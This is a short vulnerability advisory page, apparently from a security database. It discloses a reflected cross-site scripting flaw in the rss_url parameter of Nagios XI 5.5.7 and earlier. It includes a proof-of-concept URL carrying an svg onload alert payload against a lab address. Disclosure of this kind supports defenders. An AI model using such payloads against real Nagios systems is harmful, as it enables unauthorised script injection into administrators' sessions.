Nagios XI <=5.5.7 Reflect XSS#2

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### Nagios XI <=5.5.7 Reflect XSS#2 The rss_url parameter of magpie_slashbox.php is not filtered, resulting in an XSS vulnerability. #### Affected Version * Nagios XI <= 5.5.7 #### Proof of concept ``` http://192.168.177.128/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_slashbox.php?rss_url=111%22%3Csvg%2Fonload%3Dalert%281%29%3E ``` ![](https://images.seebug.org/1544443015000-w331s)

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息